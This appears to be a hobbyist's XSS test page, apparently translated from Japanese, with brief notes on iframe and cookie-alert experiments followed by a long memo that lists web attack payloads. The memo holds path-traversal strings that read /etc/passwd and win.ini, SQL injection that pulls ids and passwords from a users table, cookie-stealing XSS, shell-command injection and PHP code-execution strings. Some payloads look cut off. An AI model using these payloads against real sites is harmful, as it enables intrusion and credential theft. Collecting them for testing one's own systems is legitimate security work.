bomibako XSS Test---
Hello!
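--- Test of displaying Yahoo in an iframe within my own domain
Test of loading an image via a JS-generated DOM
I placed a web beacon that is supposedly able to survey share lists for Twitter and the like: http://getshar.es/create
I didn't really understand it, so I'm leaving it alone
Image loading? No, a JS alert display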

Just a test, nothing at all
Press to get the cookie

ぼみばこ.com

Memo '/../../../../../../../../../etc/hosts', '/../../../../../../etc/hosts', '/../../../etc/hosts', '/etc/hosts', '/../../../../../../../../../etc/hosts%00', '/../../../../../../etc/hosts%00', '/../../../etc/hosts%00', '/etc/hosts%00', '/../../../../../../../../../windows/win.ini', '/../../../../../../windows/win.ini', '/../../../windows/win.ini', '/windows/win.ini', '/../../../../../../../../../windows/win.ini%00', '/../../../../../../windows/win.ini%00', '/../../../windows/win.ini%00', '/../../../../../../../var/tmp/', '/../../../../../../../var/cache/mod_proxy/', '/../../../../../../../var/cache/', '/../../../../../../../var/www/', '/../../../../../../../etc/', '/../../../../../../../option/', '/../../../../../../../home/', '/../../../../../../../usr/', '/../../../windows/win.ini%00', '/../../../windows/win.ini%00', '/windows/win.ini%00', '?file=/etc/passwd', '?file=/Windows/win.ini', '?file=/MSOCache/', '?file=C:\Windows\System32\cmd.exe?', '/abc', '/*', '\'', '\"', '\,', "'", "' and 'a'='a'", "test and 1=1", "test ' or 'a'='a'", "%", "', \", <, and >", "'>\">
", "'>\">", "", "javascript:alert(document.cookie);", "/../../../../../../../sbin/ifconfig|", ";/sbin/ifconfig", "/../../../../../../../windows/system32/ipconfig|", "&/windows/system32/ipconfig", "'+AND+'1'%3D'1", "'waitfor%20delay'0%3a0%3a20'--", "'waitfor%20delay'0%3a0%3a00'--", "''\"\"¥", "'\"¥'\"¥", "'+AND+'1'%3D'2", "'+AND+'1'%3D'1", "'++'", "'++'’", ">alert("XSS")', '1%00">◆◆◆◆◆◆◆◆◆◆◆◆<', '', '', '20pt', 'XSS', '', 'XSS part2', '?file=http://bomibako.com/myphp.txt', '?file=php://echo"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"', "?heighlight=a','a',phpinfo());//", "filter_func=preg_replace&from=/^/e&to=phpinfo();", "?dir=| cat /etc/passwd", "?dir=--version", "xxx OR 1/*", '1+onmouseover%3dalert(document.cookie)', '"+onmouseover%3d"alert(document.cookie)',
// name may be changed; where possible, match it to a variable that exists in the system
'name=");alert(document.cookie)//', 'name=\');alert(document.cookie)//', "name='+and+cast((select+id||':'||pwd+from+users+offset+0+limit+1)+as+integr)>1--", "name='+union+select+id,pwd,name,addr,null,null,null+from+users--", "name=';copy+users(name)+from+'/etc/passwd'--", "author='+union+select+table_name,column_name,data_type,null,null,null+from+information_schema.columns+order+by+1--", "PHPSESSID=KBMJ"